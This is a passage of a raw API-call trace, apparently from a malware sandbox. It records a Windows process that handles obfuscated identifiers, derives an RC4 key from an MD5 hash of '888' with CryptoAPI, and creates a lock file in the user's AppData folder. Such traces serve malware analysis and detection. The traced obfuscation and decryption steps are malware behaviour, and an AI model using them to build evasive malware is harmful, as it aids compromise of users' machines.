wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.176] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0123.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.177] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.177] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0123.177] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.177] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0123.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0123.177] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.177] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.177] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0123.177] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.177] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0123.177] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0123.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0123.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0123.178] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0123.178] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.179] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.179] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.179] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0123.179] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0123.179] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0123.179] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0123.179] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.179] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.180] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.180] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.183] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.183] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.183] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.183] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa468, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0123.183] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71be8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0123.183] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0123.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0123.183] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.183] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa2b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0123.184] CryptHashData (hHash=0x9a42c0, pbData=0x2a71cc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0123.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.184] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.184] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa528, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0123.184] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9a42c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4880) returned 1 [0123.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0123.184] CryptDestroyHash (hHash=0x9a42c0) returned 1 [0123.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Macromedia" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.185] GetLastError () returned 0x5 [0123.185] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0123.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0123.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0123.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0123.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0123.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Macromedia" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.macromedia"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0123.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0123.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0123.189] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0123.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 